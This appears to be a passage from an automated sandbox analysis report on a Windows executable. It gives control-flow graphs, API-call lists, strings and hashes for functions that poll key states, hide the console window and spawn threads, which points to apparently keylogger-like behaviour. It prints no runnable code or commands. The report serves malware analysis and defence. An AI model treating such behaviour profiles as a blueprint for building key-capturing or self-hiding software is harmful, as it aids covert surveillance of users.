?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 2734->2736 2735->2637 2736->2735 2737->2739 2738 7ff77c91e9dd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2740 7ff77c91ea00 2738->2740 2739->2734 2739->2738 2741 7ff77c91ea36 2739->2741 2742 7ff77c91e9da 2739->2742 2743 7ff77c91e9ad ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2739->2743 2740->2741 2744 7ff77c91ea09 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 2740->2744 2741->2734 2742->2738 2743->2739 2744->2740 2746 7ff77c91e5a0 2745->2746 2746->2746 2747 7ff77c91e5bc 2746->2747 2748 7ff77c91e683 2746->2748 2749 7ff77c91e5c2 memcpy 2747->2749 2758 7ff77c91e5df 2747->2758 2771 7ff77c911e00 ?_Xlength_error@std@@YAXPEBD 2748->2771 2751 7ff77c91e66d 2749->2751 2751->2703 2752 7ff77c91e5eb 2755 7ff77c9201c0 3 API calls 2752->2755 2753 7ff77c91e688 2756 7ff77c911d60 Concurrency::cancel_current_task __std_exception_copy 2753->2756 2754 7ff77c91e64f memcpy 2754->2751 2759 7ff77c91e601 2755->2759 2760 7ff77c91e68e 2756->2760 2757 7ff77c91e647 2761 7ff77c9201c0 3 API calls 2757->2761 2758->2752 2758->2753 2758->2754 2758->2757 2762 7ff77c91e640 _invalid_parameter_noinfo_noreturn 2759->2762 2763 7ff77c91e606 2759->2763 2761->2763 2762->2757 2763->2754 2765 7ff77c91e4df 2764->2765 2770 7ff77c91e47b 2764->2770 2766 7ff77c91e500 _invalid_parameter_noinfo_noreturn 2765->2766 2772 7ff77c91f220 2766->2772 2767 7ff77c92050c free 2767->2770 2770->2765 2770->2766 2770->2767 2774 7ff77c91f23c 2772->2774 2777 7ff77c91e528 2772->2777 2773 7ff77c91f220 free 2773->2774 2774->2773 2775 7ff77c91f2d1 _invalid_parameter_noinfo_noreturn 2774->2775 2776 7ff77c92050c free 2774->2776 2774->2777 2776->2774 2796 7ff77c91eab0 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 2872 7ff77c921ff6 _seh_filter_exe

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF77C91C0D0 Relevance: 103.4, APIs: 46, Strings: 12, Instructions: 1928processkeyboardthreadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 7ff77c91c0d0-7ff77c91c1e0 1 7ff77c91c2eb-7ff77c91c2f8 0->1 2 7ff77c91c1e6-7ff77c91c1f8 0->2 4 7ff77c91c300-7ff77c91c32d 1->4 3 7ff77c91c200-7ff77c91c2df 2->3 3->3 5 7ff77c91c2e5-7ff77c91c2e9 3->5 4->4 6 7ff77c91c32f-7ff77c91c3a5 system GetConsoleWindow GetWindowLongW SetWindowLongW SetLayeredWindowAttributes GetConsoleWindow ShowWindow 4->6 5->1 5->6 7 7ff77c91c3ab-7ff77c91c47e 6->7 8 7ff77c91c480-7ff77c91c487 6->8 9 7ff77c91c4c2-7ff77c91c522 system call 7ff77c9201c0 _beginthreadex 7->9 10 7ff77c91c490-7ff77c91c4c0 8->10 13 7ff77c91c528-7ff77c91c568 9->13 14 7ff77c91e437-7ff77c91e449 ?_Throw_Cpp_error@std@@YAXH@Z 9->14 10->9 10->10 15 7ff77c91c66b-7ff77c91c676 13->15 16 7ff77c91c56e-7ff77c91c57e 13->16 18 7ff77c91c680-7ff77c91c6ad 15->18 17 7ff77c91c580-7ff77c91c65f 16->17 17->17 19 7ff77c91c665-7ff77c91c669 17->19 18->18 20 7ff77c91c6af-7ff77c91c6c1 system 18->20 19->15 19->20 21 7ff77c91c6c7-7ff77c91c6df _Thrd_detach 20->21 22 7ff77c91e42b-7ff77c91e436 ?_Throw_Cpp_error@std@@YAXH@Z 20->22 21->22 23 7ff77c91c6e5-7ff77c91c703 21->23 22->14 24 7ff77c91c765-7ff77c91c76c 23->24 25 7ff77c91c705-7ff77c91c763 23->25 27 7ff77c91c770-7ff77c91c7a0 24->27 26 7ff77c91c7a2-7ff77c91c81f system call 7ff77c9201c0 25->26 30 7ff77c91c85f-7ff77c91c8de call 7ff77c92050c call 7ff77c9201c0 26->30 31 7ff77c91c821-7ff77c91c82f 26->31 27->26 27->27 41 7ff77c91c8e0-7ff77c91c8ee 30->41 42 7ff77c91c91f-7ff77c91c9c1 call 7ff77c92050c CreateThread * 2 Sleep 30->42 32 7ff77c91c830-7ff77c91c85d call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 31->32 32->30 44 7ff77c91c8f0-7ff77c91c91d call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 41->44 47 7ff77c91c9ff-7ff77c91ca79 call 7ff77c9201c0 42->47 48 7ff77c91c9c3-7ff77c91c9ce 42->48 44->42 57 7ff77c91ca7b-7ff77c91ca89 47->57 58 7ff77c91cabf-7ff77c91cb3b call 7ff77c92050c call 7ff77c9201c0 47->58 50 7ff77c91c9d0-7ff77c91c9fd call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 48->50 50->47 61 7ff77c91ca90-7ff77c91cabd call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 57->61 70 7ff77c91cb3d-7ff77c91cb4b 58->70 71 7ff77c91cb7f-7ff77c91cbf1 call 7ff77c92050c CreateThread 58->71 61->58 72 7ff77c91cb50-7ff77c91cb7d call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 70->72 76 7ff77c91cbf7-7ff77c91cc07 71->76 77 7ff77c91ccfb-7ff77c91cd06 71->77 72->71 79 7ff77c91cc10-7ff77c91ccef 76->79 80 7ff77c91cd10-7ff77c91cd3d 77->80 79->79 82 7ff77c91ccf5-7ff77c91ccf9 79->82 80->80 83 7ff77c91cd3f-7ff77c91cd8d remove Sleep 80->83 82->77 82->83 85 7ff77c91cd90-7ff77c91cdb7 GetConsoleWindow ShowWindow 83->85 86 7ff77c91cdbd-7ff77c91cdc4 85->86 87 7ff77c91ce62-7ff77c91d00f system call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 85->87 88 7ff77c91ce26-7ff77c91ce2d 86->88 89 7ff77c91cdc6-7ff77c91ce24 86->89 119 7ff77c91d04f-7ff77c91d164 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 87->119 120 7ff77c91d011-7ff77c91d01c 87->120 91 7ff77c91ce30-7ff77c91ce60 88->91 89->87 91->87 91->91 140 7ff77c91d1a0-7ff77c91d2b4 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 119->140 141 7ff77c91d166 119->141 121 7ff77c91d020-7ff77c91d04d call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 120->121 121->119 161 7ff77c91d2f0-7ff77c91d578 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 140->161 162 7ff77c91d2b6 140->162 143 7ff77c91d171-7ff77c91d19e call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 141->143 143->140 210 7ff77c91d57a 161->210 211 7ff77c91d5b4-7ff77c91d6c7 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 161->211 163 7ff77c91d2c1-7ff77c91d2ee call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 162->163 163->161 212 7ff77c91d585-7ff77c91d5b2 call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 210->212 231 7ff77c91d6c9 211->231 232 7ff77c91d703-7ff77c91d815 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 211->232 212->211 233 7ff77c91d6d4-7ff77c91d701 call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 231->233 252 7ff77c91d817 232->252 253 7ff77c91d851-7ff77c91dae4 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 232->253 233->232 255 7ff77c91d822-7ff77c91d84f call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 252->255 301 7ff77c91db20-7ff77c91dc33 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 253->301 302 7ff77c91dae6 253->302 255->253 322 7ff77c91dc6f-7ff77c91dd83 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 301->322 323 7ff77c91dc35 301->323 304 7ff77c91daf1-7ff77c91db1e call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 302->304 304->301 343 7ff77c91ddbf-7ff77c91de84 call 7ff77c91e570 * 2 call 7ff77c91f0c0 call 7ff77c91ef20 call 7ff77c9201fc call 7ff77c91ec40 call 7ff77c91e450 GetAsyncKeyState 322->343 344 7ff77c91dd85 322->344 324 7ff77c91dc40-7ff77c91dc6d call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 323->324 324->322 364 7ff77c91dec8-7ff77c91df04 Beep call 7ff77c9121e0 343->364 365 7ff77c91de86 343->365 345 7ff77c91dd90-7ff77c91ddbd call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 344->345 345->343 373 7ff77c91df0a-7ff77c91df1a 364->373 374 7ff77c91e00b-7ff77c91e016 364->374 367 7ff77c91de90-7ff77c91de9e GetAsyncKeyState 365->367 369 7ff77c91e29f-7ff77c91e2cd call 7ff77c912ef0 367->369 370 7ff77c91dea4-7ff77c91deb2 GetAsyncKeyState 367->370 385 7ff77c91e3d8-7ff77c91e3e7 369->385 386 7ff77c91e2d3-7ff77c91e2e8 369->386 371 7ff77c91deb8-7ff77c91dec6 GetAsyncKeyState 370->371 372 7ff77c91e121-7ff77c91e14b 370->372 371->364 371->367 377 7ff77c91e24c-7ff77c91e257 372->377 378 7ff77c91e151-7ff77c91e15d 372->378 376 7ff77c91df20-7ff77c91dfff 373->376 379 7ff77c91e020-7ff77c91e04d 374->379 376->376 381 7ff77c91e005-7ff77c91e009 376->381 384 7ff77c91e260-7ff77c91e28d 377->384 382 7ff77c91e161-7ff77c91e240 378->382 379->379 383 7ff77c91e04f-7ff77c91e0d0 system call 7ff77c9201c0 379->383 381->374 381->383 382->382 389 7ff77c91e246-7ff77c91e24a 382->389 395 7ff77c91e10f-7ff77c91e11c call 7ff77c92050c 383->395 396 7ff77c91e0d2-7ff77c91e0dd 383->396 384->384 391 7ff77c91e28f-7ff77c91e29a system 384->391 388 7ff77c91e3f0-7ff77c91e419 385->388 387 7ff77c91e2f0-7ff77c91e3cd 386->387 387->387 392 7ff77c91e3d3-7ff77c91e3d6 387->392 388->388 393 7ff77c91e41b-7ff77c91e426 system 388->393 389->377 389->391 391->85 392->385 392->393 393->85 395->85 398 7ff77c91e0e0-7ff77c91e10d call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 396->398 398->395
                                                                                                                  APIs
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C336
                                                                                                                  • GetConsoleWindow.KERNELBASE ref: 00007FF77C91C33C
                                                                                                                  • GetWindowLongW.USER32 ref: 00007FF77C91C34D
                                                                                                                  • SetWindowLongW.USER32 ref: 00007FF77C91C362
                                                                                                                  • SetLayeredWindowAttributes.USER32 ref: 00007FF77C91C376
                                                                                                                  • GetConsoleWindow.KERNELBASE ref: 00007FF77C91C37C
                                                                                                                  • ShowWindow.USER32 ref: 00007FF77C91C38A
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C4C9
                                                                                                                  • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C512
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C6B4
                                                                                                                  • _Thrd_detach.MSVCP140 ref: 00007FF77C91C6D7
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91C7A9
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91C845
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91C905
                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF77C91C944
                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF77C91C962
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C91C96D
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91C9E5
                                                                                                                  • remove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF77C91CD44
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF77C91CD4F
                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 00007FF77C91CD90
                                                                                                                  • ShowWindow.USER32 ref: 00007FF77C91CD9E
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91CE69
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D035
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC80
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91EC8C
                                                                                                                    • Part of subcall function 00007FF77C91EC40: GetStdHandle.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECB2
                                                                                                                    • Part of subcall function 00007FF77C91EC40: SetConsoleTextAttribute.KERNEL32(?,00000000,00000000,00007FF77C912FBF), ref: 00007FF77C91ECBF
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D186
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D2D6
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D59A
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D6E9
                                                                                                                    • Part of subcall function 00007FF77C91E450: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF77C912FCB), ref: 00007FF77C91E500
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91D837
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91DB06
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91DC55
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91DDA5
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DE7B
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DE95
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DEA9
                                                                                                                  • GetAsyncKeyState.USER32 ref: 00007FF77C91DEBD
                                                                                                                  • Beep.KERNEL32 ref: 00007FF77C91DECF
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91E054
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91E0F5
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91CAA5
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_frequency.MSVCP140 ref: 00007FF77C91EB40
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_counter.MSVCP140 ref: 00007FF77C91EB49
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EBE9
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EC17
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C91CB65
                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF77C91CBAB
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E92F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF77C91E94F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E95F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9BE
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9EA
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91EA1A
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91E294
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C91E420
                                                                                                                  • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF77C91E430
                                                                                                                  • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF77C91E443
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$Windowsystem$Console$AsyncSleepState$?sputc@?$basic_streambuf@CreateThread$?good@ios_base@std@@AttributeCpp_error@std@@HandleLongShowTextThrow_$?flush@?$basic_ostream@AttributesBeepLayeredQuery_perf_counterQuery_perf_frequencyThrd_detachV12@_beginthreadex_invalid_parameter_noinfo_noreturnremove
                                                                                                                  • String ID: [ $ [ $ {3/=Y$ -> $$$...$/$2$CLEAN$CORD $RIALS$g
                                                                                                                  • API String ID: 2431152118-3230283055
                                                                                                                  • Opcode ID: 44f985fbd5678d5907bc988f1348afe19341bae3da2febf82a29eb50d1b292fd
                                                                                                                  • Instruction ID: a820ffe412fcf4583119756647ddf9e00937cfb5443ef566cd35a9fe2cbe92b2
                                                                                                                  • Opcode Fuzzy Hash: 44f985fbd5678d5907bc988f1348afe19341bae3da2febf82a29eb50d1b292fd
                                                                                                                  • Instruction Fuzzy Hash: 9813DB27D38B818AE751AB34D4412E9F364FF9A344F809732E68D26A55EF7CE245CB10
                                                                                                                  Function 00007FF77C920624 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1133592946-0
                                                                                                                  • Opcode ID: 4ef5377b25107f2a1d837aabb317369dc2c5c0e0720e2edbdbad70c8d92f59fc
                                                                                                                  • Instruction ID: ebc971b7c29f11cdb04001c514d8a766e59c0743a590f81f0b49daa128332ce9
                                                                                                                  • Opcode Fuzzy Hash: 4ef5377b25107f2a1d837aabb317369dc2c5c0e0720e2edbdbad70c8d92f59fc
                                                                                                                  • Instruction Fuzzy Hash: BF314F33A3924281EBD4BB2098513B9D651AF4DB84FC65035E6CD076D3DE2CA8048E70
                                                                                                                  Function 00007FF77C91BE50 Relevance: 9.2, APIs: 6, Instructions: 168keyboardCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 455 7ff77c91be50-7ff77c91be75 456 7ff77c91be77-7ff77c91be81 455->456 457 7ff77c91be83-7ff77c91be87 455->457 458 7ff77c91be8a-7ff77c91bea0 456->458 457->458 459 7ff77c91beab-7ff77c91bebb 458->459 460 7ff77c91bea2-7ff77c91bea6 458->460 462 7ff77c91bec1-7ff77c91bec4 459->462 463 7ff77c91bfa3-7ff77c91bfa8 call 7ff77c911e00 459->463 461 7ff77c91bf8d-7ff77c91bfa2 460->461 464 7ff77c91bf57-7ff77c91bf5e 462->464 465 7ff77c91beca-7ff77c91bed4 462->465 476 7ff77c91bfa9-7ff77c91bfce call 7ff77c911d60 463->476 467 7ff77c91bf60 464->467 468 7ff77c91bf63-7ff77c91bf6c 464->468 469 7ff77c91bf1b-7ff77c91bf38 465->469 470 7ff77c91bed6-7ff77c91bee3 465->470 467->468 472 7ff77c91bf6e 468->472 473 7ff77c91bf84-7ff77c91bf88 468->473 475 7ff77c91bf3a-7ff77c91bf3d 469->475 469->476 474 7ff77c91bee7-7ff77c91beee 470->474 477 7ff77c91bf70-7ff77c91bf82 472->477 473->461 478 7ff77c91bf4b call 7ff77c9201c0 474->478 479 7ff77c91bef0-7ff77c91bef7 474->479 475->474 480 7ff77c91bf3f-7ff77c91bf42 475->480 486 7ff77c91bfd0-7ff77c91c006 call 7ff77c91bc80 call 7ff77c91be50 SetConsoleTitleW call 7ff77c91ead0 476->486 477->473 477->477 482 7ff77c91bf50-7ff77c91bf53 478->482 479->476 485 7ff77c91befd-7ff77c91bf0b call 7ff77c9201c0 479->485 480->482 482->464 491 7ff77c91bf0d-7ff77c91bf19 485->491 492 7ff77c91bf44-7ff77c91bf4a _invalid_parameter_noinfo_noreturn 485->492 496 7ff77c91c00b-7ff77c91c014 486->496 491->482 492->478 497 7ff77c91c049-7ff77c91c065 496->497 498 7ff77c91c016-7ff77c91c02d 496->498 497->486 501 7ff77c91c06b-7ff77c91c07d 497->501 499 7ff77c91c02f-7ff77c91c042 498->499 500 7ff77c91c044 call 7ff77c92050c 498->500 499->500 502 7ff77c91c09e-7ff77c91c0a4 _invalid_parameter_noinfo_noreturn 499->502 500->497 504 7ff77c91c07f-7ff77c91c092 501->504 505 7ff77c91c094-7ff77c91c099 call 7ff77c92050c 501->505 507 7ff77c91c0a5-7ff77c91c0b0 _invalid_parameter_noinfo_noreturn 502->507 504->505 504->507 505->486 509 7ff77c91c0b4-7ff77c91c0be GetAsyncKeyState 507->509 509->509 510 7ff77c91c0c0-7ff77c91c0c5 call 7ff77c9132e0 509->510 510->509
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AsyncConcurrency::cancel_current_taskConsoleStateTitlemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3654954394-0
                                                                                                                  • Opcode ID: ab273bf31dccc9d7ad5ac621e40352442693ef51d9a40282266747e1f2efc9f3
                                                                                                                  • Instruction ID: 4eddfd319a24fb20743b134f2f2f5243417d149b2ad46cca3d8e60c4c0a3b92e
